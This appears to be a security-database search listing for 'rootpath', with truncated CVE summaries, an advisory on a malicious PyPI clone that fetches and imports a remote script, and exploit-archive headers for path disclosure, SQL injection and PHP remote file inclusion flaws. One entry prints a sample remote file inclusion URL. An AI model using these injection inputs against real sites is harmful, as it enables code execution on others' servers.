CVE-2026-26190

Milvus is an open-source vector database built for generative AI applications. Prior to 2.5.27 and 2.6.10, Milvus exposes TCP port 9091 by default, which enables authentication bypasses. The /expr debug endpoint uses a weak, predictable default authentication token derived from etcd.rootPath...

Malicious code in python-rootpath (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 bb867560d676e7b79ce110b230906a9630feb223cbcb6072bff5a2636c60a3c7 Hidden code downloads, saves and import a remote script. The package itself is a clone of a legitimate "rootpath". At the time of analysis, the remote script d...

MAL-2025-191841 Malicious code in python-rootpath (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 bb867560d676e7b79ce110b230906a9630feb223cbcb6072bff5a2636c60a3c7 Hidden code downloads, saves and import a remote script. The package itself is a clone of a legitimate "rootpath". At the time of analysis, the remote script d...

CVE-2024-29470

OneBlog v2.3.4 was discovered to contain a stored cross-site scripting XSS vulnerability via the component rootpath/links...

CVE-2019-17175

joyplus-cms 1.6.0 allows manager/adminpic.php?rootpath= absolute path traversal...

CVE-2019-17175

joyplus-cms 1.6.0 allows manager/adminpic.php?rootpath= absolute path traversal...

s-cms 2.5 - Multiple Vulnerabilities

No description provided by source. ============================================================ Exploit Title: S-CMS Multiple Vuln Date: 14/11/2010 Author: LordTittiS Greetings To: GodOfPain, SystemOveride Software Link: http://www.matteoiammarrone.com http://www.matteoiammarrone.com/public/s-cms...

Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability

No description provided by source. Exploit Title: Punbb 1.3.4 Full Path Disclosure Date: 07/11/2010 Author: SYSTEMOVERIDE, OverSecurityCrew Software Link: http://punbb.informer.com/ Vulnerability Type: Full Path Disclosure Version: 1.3.4 Vulnerability Details: The vulnerabilities are in the file...

Invision Power Board 3 - 'search_app' SQL Injection

============================================================ Exploit Title: Invision Power Board 3 Multiple Vuln Date: 13/11/2010 Author: LordTittiS Greetings To: GodOfPain, SystemOveride Software Link: http://www.invisionpower.com/ Vulnerability Type: Full Path Disclosure Version: 3.x.x All 3...

Punbb 1.3.4 Full Path Disclosure Vulnerability

Exploit for php platform in category web applications ============================================== Punbb 1.3.4 Full Path Disclosure Vulnerability ============================================== Exploit Title: Punbb 1.3.4 Full Path Disclosure Date: 07/11/2010 Author: SYSTEMOVERIDE, OverSecurityCr...

MetInfo 3.0 - PHP Code Injection

Exploit Title£ºMetInfo 3.0 PHP Code Injection Vulnerability Date:2010-10-31 Author£ºlinux520.com Team£ºhttp://www.linux520.com/ Vendor£ºhttp://www.metinfo.cn/ Dork£º"Powered by MetInfo 3.0 " Google: 400,000 + results Price£º free Language£ºPHP Greetz£ºCCAV +Description£º at 67 line of...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in Direct News 4.10.2, when registerglobals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter to 1 admin/menu.php and 2 library/lib.menu.php; and the adminroot parameter to 3...

DreamStats System Rootpath远程文件包含漏洞

DreamStats是一款基于PHP的WEB应用程序。 DreamStats不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'index.PHP'脚本对用户提交的'rootpath'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 mnProjects Dreamstats 4.2 目前没有解决方案提供： http://www.mnprojects.com/dreamstats/ http://www.example.com/PaTh/index.php?rootpath=Shell...

Remote file inclusion

PHP remote file inclusion vulnerability in index.php in Miguel Nunes Call of Duty 2 CoD2 DreamStats System 4.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter...

CVE-2006-5480

PHP remote file inclusion vulnerability in lib/rs.php in 2le.net Castor PHP Web Builder 1.1.1 allows remote attackers to execute arbitrary PHP code via the rootpath parameter...

PT-2006-2939 · Unknown · Rechnungszentrale V2

Name of the Vulnerable Software and Affected Versions: RechnungsZentrale V2 versions 1.1.3 and earlier Description: A remote file inclusion issue in the authent.php4 file allows remote attackers to execute arbitrary PHP code via a URL in the rootpath parameter. Recommendations: For...